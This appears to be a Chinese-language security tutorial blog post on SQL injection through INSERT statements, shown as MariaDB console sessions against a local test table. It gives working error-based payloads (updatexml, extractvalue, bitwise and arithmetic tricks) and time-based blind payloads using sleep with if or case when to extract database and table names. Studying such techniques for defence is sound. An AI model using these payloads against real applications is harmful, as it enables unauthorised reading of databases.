[sql 注入] insert 報錯注入與延時盲注

阿新 • • 發佈：2020-11-25

insert注入的技巧在於如何在一個欄位值內構造閉合。

insert 報錯注入

演示案例所用的表：

MariaDB [mysql]> desc test;
+--------+----------+------+-----+---------+-------+
| Field  | Type     | Null | Key | Default | Extra |
+--------+----------+------+-----+---------+-------+
| id     | int(10)  | YES  |     | NULL    |       |
| uname  | char(10) | YES  |     | NULL    |       |
| passwd | char(10) | YES  |     | NULL    |       |
+--------+----------+------+-----+---------+-------+

0x01: insert數字型報錯注入

MariaDB [mysql]> insert into test values(1 and updatexml(1,concat(0x7e,database(),0x7e),1),'2','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql~'

0x02: insert字元型報錯注入

提示：字元型的關鍵在於如何在一個欄位值內構造閉合。

MariaDB [mysql]> insert into test values(1,'2' and updatexml(1,concat(0x7e,database(),0x7e),1)  and '','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql~'

0x03: 用extractvalue代替updatexml

MariaDB [mysql]> insert into test values(1,'2' and extractvalue(1,concat(0x7e,database()))  and '','3');
ERROR 1105 (HY000): XPATH syntax error: '~mysql'

0x04: 使用按位運算子製造insert數字型報錯注入

產生報錯是因為1和(select database())的值做按位運算，但是字元不能做按位運算，所以會報錯提示哪個值型別錯誤。"& , | , ^"運算同理。

按位運算詳情請參考此連結

MariaDB [mysql]> insert into test values(1 ^ (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

MariaDB [mysql]> insert into test values(1 | (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

MariaDB [mysql]> insert into test values(1 & (select database()),'2','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

0x05: 使用按位運算子製造insert字元型報錯注入

insert into test values(1,'1' & (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

0x06: 使用算術運算子製造insert報錯注入（+，-，%，/），靈活運用按位運算子,邏輯運算子,算術運算子。

MariaDB [mysql]> insert into test values(1,'1' + (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' - (select database()) and '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' / (select database()) or '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' % (select database()) & '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' % (select database()) | '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' % (select database()) / '','3');
ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

insert延時盲注

在學習延時盲注之前你需要具備sql（sleep(),if(),substr(),ascii(),case when）的用法。

0x07: 一個簡單示例

原始正常語句：
MariaDB [mysql]> insert into test values(1,('2'),'3');
Query OK, 1 row affected (0.005 sec)

MariaDB [mysql]> insert into test values(1,('1') and sleep(3) and (''),'3');
Query OK, 1 row affected, 1 warning (3.002 sec)

0x08: 猜測當前所在庫的名稱長度，如果資料庫長度等於5則延時3秒輸出內容。

MariaDB [mysql]> insert into test values(1,('1') and sleep(if((select length(database()))=5,3,0)) and (''),'3');
Query OK, 1 row affected, 1 warning (3.007 sec)

0x09: 猜測當前庫的第一個表名的第一個字元的ascii碼。慢慢去理解，慢就是快。

實際的值：
MariaDB [mysql]> select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1));
+---------------------------------------------------------------------------------------------------------------+
| ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) |
+---------------------------------------------------------------------------------------------------------------+
|                                                                                                           112 |
+---------------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)

insert盲注如下所示：
MariaDB [mysql]> insert into test values(1,('1') and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=112,3,0)) and (''),'3');
Query OK, 1 row affected, 1 warning (3.005 sec)

0x10: 用case then代替if():

MariaDB [mysql]> insert into test values(1,('2') and case when (select length(database())) = 5 then sleep(2) else 0 end and (''),'3');
Query OK, 1 row affected, 1 warning (2.002 sec)

MariaDB [mysql]> insert into test values(1,('2') and case when ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 112 then sleep(2) else 0 end and (''),'3');
Query OK, 1 row affected, 1 warning (2.004 sec)